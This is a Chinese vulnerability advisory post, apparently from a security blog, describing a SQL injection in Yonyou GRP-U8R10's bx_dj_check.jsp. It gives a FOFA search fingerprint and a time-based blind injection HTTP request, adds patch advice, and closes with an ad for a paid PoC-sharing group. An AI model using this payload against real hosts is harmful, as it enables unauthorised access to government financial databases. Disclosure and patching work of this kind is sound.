官方网站建设公司,平面设计提升培训中心,网站自建系统,王野摩托车是什么牌子0x01 免责声明
请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;作者不为此承担任何责任。工具来自网络#xff0c;安全性自测#xff0c;如有侵权请联系删…
0x01 免责声明
请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任。工具来自网络安全性自测如有侵权请联系删除。本次测试仅供学习使用如若非法他用与平台和本文作者无关需自行负责
0x02 产品介绍
用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业基于云计算技术所推出的新一代产品是我国行政事业财务领域最专业的政府财务管理软件。
0x03 漏洞威胁
用友GRP-U8R10行政事业内控管理软件 bx_dj_check.jsp 接口处存在SQL注入漏洞未授权的攻击者可利用此漏洞获取数据库权限深入利用可获取服务器权限。
影响范围
用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager产品分B、C、G三个产品系列以上受到本次通报漏洞的影响。
0x04 漏洞环境
FOFA:
app用友-GRP-U8 0x05 漏洞复现
POC
GET /u8qx/bx_dj_check.jsp?djlxdmOERdjid1;waitfordelay0:0:5-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Connection: close
延时注入 0x06 批量脚本验证
Nuclei验证脚本已发布知识星球冷漠安全 0x07 修复建议
加固补丁通过过滤特殊SQL关键字、增加预编译防止通过入参进行SQL注入。请所有渠道总经理、技术支持部联动向下传达到客户和沟通群。
补丁名称20230713-关于用友GRP-U8中u8qx下SelectDMJE.jsp及bx_dj_check.jsp存在SQL注入漏洞的解决方案.zip
可在公告《关于用友GRP-U8内控管理软件存在SQL(u8qx\SelectDMJE.jsp)注入漏洞的安全通告》里面下载。
0x08 加入我们
漏洞详情及批量检测POC工具请前往知识星球获取
知识星球冷漠安全 交个朋友限时优惠券加入立减25 星球福利每天更新最新漏洞POC、资料文献、内部工具等 「星球介绍」
本星球不割韭菜不发烂大街东西。欢迎进来白嫖不满意三天退款。
本星球坚持每天分享一些攻防知识包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。
本星主已加入几十余个付费星球定期汇聚高质量资料及工具进行星球分享。 「星球服务」 加入星球你会获得 ♦ 批量验证漏洞POC脚本 ♦ 0day、1day分享 ♦ 汇集其它付费星球资源分享 ♦ 大量的红蓝对抗实战资源 ♦ 优秀的内部红蓝工具及插件 ♦ 综合类别优秀Wiki文库及漏洞库 ♦ 提问及技术交流
